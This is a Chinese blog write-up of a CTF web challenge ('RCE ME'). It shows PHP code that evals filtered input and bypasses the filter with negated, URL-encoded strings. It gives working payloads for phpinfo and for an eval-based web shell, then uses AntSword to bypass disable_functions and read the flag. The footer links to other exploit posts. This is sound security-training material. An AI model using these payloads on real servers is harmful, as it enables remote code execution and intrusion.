BUUCTF[极客大挑战 2019]RCE ME

最新推荐文章于 2024-02-15 22:18:56 发布
最新推荐文章于 2024-02-15 22:18:56 发布
阅读量2.7k 收藏 1
点赞数 4
分类专栏: ctf刷题记录 文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/123434962
版权 

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

打开链接发现,发现是正则绕过,这里我们可以用取反来绕过

<?php 
error_reporting(0);
echo(urlencode(~'phpinfo'));
 ?>

payload:?code=(~%8F%97%8F%96%91%99%90)();

查看phpinfo,发现函数禁用有点多

 写一个shell试试能不能连上

<?php 
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "          ";
$c='(eval($_POST[bypass]))';
$d=urlencode(~$c);
echo $d;
 ?>

payload:?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9D%86%8F%9E%8C%8C%A2%D6%D6);

 

shell检测有效,连上蚁剑,这里可以使用蚁剑的插件来绕开disable_functions

 

 使用此插件打开终端

然后输入/readflag,得到flag

 

 

 

H3018-R
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve_2019_0708_bluekeep_rce:蓝皮漏洞利用
04-29
cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb rdp.rb 替换 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ...
cve_2019_0708_bluekeep_rce.rb
09-07
2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。...
BUUCTF[挑战 2019]RCE ME1
wyp106343873的博客
12-06 722
一个个人的学习过程
[挑战 2019]RCE ME
eliforsharon的博客
02-16 3393
链接: buuctf [挑战 2019]RCE ME. 写在前面 啊通过这道题学到了很多新的知识,在此记录一下 无字母数字RCE 通过取反或异或来进行绕过,即将不含字母数字的字符串通过取反或异或的方式构造想要的payload。 这里想要构造的payload即为 assert(eval($_POST['ma'])); 既可以采用 ...
[挑战 2019]RCE ME1 ~~不会编程的崽
最新发布
不会编程的崽的博客
02-15 585
rce 取反绕过
buuctf 挑战 babysql
SopRomeo的博客
01-17 1668
emmmmm这道题,常规注入不可行,很明显过滤了什么字符,我试了下双写,没想到可行。。 接着就直接上图吧 跟之前lovesql差不多
BUUCTF-[挑战 2019]PHP1
Monica的博客
09-27 3620
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
BUUCTF 36
qq_52431855的博客
03-03 192
知识点 preg_match() 函数 语法:int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数: 作用:在subject 字符串中搜索与pattern给出的正则表达式相匹配的内容。 关于PHP正则的一些绕过方法 36-1[BSidesCF 2019]Futurella 做题...
BUUCTF:[挑战 2019]RCE ME ——两种方法
m0_62879498的博客
05-16 3442
BUUCTF:[挑战 2019]RCE ME 打开环境是 代码审计题 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
[挑战 2019]RCE ME buuctf 题目详解思路
weixin_73560599的博客
08-31 529
非常经典的无字母数字RCE 且这套题目加了些过滤条件 不是特别难 只是有个disable_function 是需要注意的
[挑战 2019]RCE ME(取反、异或绕过正则表达式、bypass disable_function)
热门推荐
qq_45521281的博客
04-21 1万+
题目进去后,很简单的代码,显然命令执行: 但是得要先绕过preg_match()中正则表达式的限制,一开始傻乎乎的直接传了个数组,妄图绕过preg_match(),这很显然是不行的。 附上大佬的文章:关于PHP正则的一些绕过方法 ...
BUUCTF:[挑战 2019]RCE ME
末初的CSDN博客
03-27 8321
这题和我这篇文章内容相关:关于PHP正则的一些绕过方法 绕过正则,有长度限制,先出一个phpinfo()看一下配置,payload很多,我上面那篇文章里面的也可以,我这里直接用取反urlencode编码绕过 PS C:\Users\Administrator> php -r "echo urlencode(~'phpinfo');" ...
[挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置
m0_64180167的博客
09-22 651
有意思。。。。过滤了数字字母我们要绕过并且执行rce这里使用取反和异或都可以。
CVE-2019-19781 Citrix Application Delivery Controller和RCE.MD
04-13
CVE-2019-19781 Citrix Application Delivery Controller和RCE
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
CVE-2019-12814:CVE-2019-12814
05-26
CVE-2019-12814 CVE-2019-12814:杰克逊JDOM XSLTransformer小工具
正则匹配绕过总计之[挑战 2019]RCE ME
qq_58970968的博客
08-23 1536
脚本:(如果ban了数字和字母就可以用这个脚本生成,但是长度会很长,对长度没有要求就可以用这个)有参数时,可以直接url编码取反 system。有参数(只禁用某些函数例如system)分为无参数(把字母和数字都禁了)...
BUUCTF WEB KOOKIE+RCE ME
qq_41696858的博客
02-28 553
继续更新 kookie 题目提示了cookie,那么就抓包看看喽 以admin进行登录,发现是以明文发送的username和password 尝试添加cookie条目,username=admin,登陆成功,拿到flag。。。。。最简单的cookie注入 rce me 这题简单粗暴的源码审计,就是不用数字字母写一个shell,长度不超过40 那么百度了以后,发现有两个绕过思路,取反或者异或,其实就是利用计算机编码的知识,在前面的if判断阶段,并不会进行字符编码运算 以取反为例,也就是说if循环看到的是取反符
ctfshow RCE挑战
10-20
ctfshow RCE挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值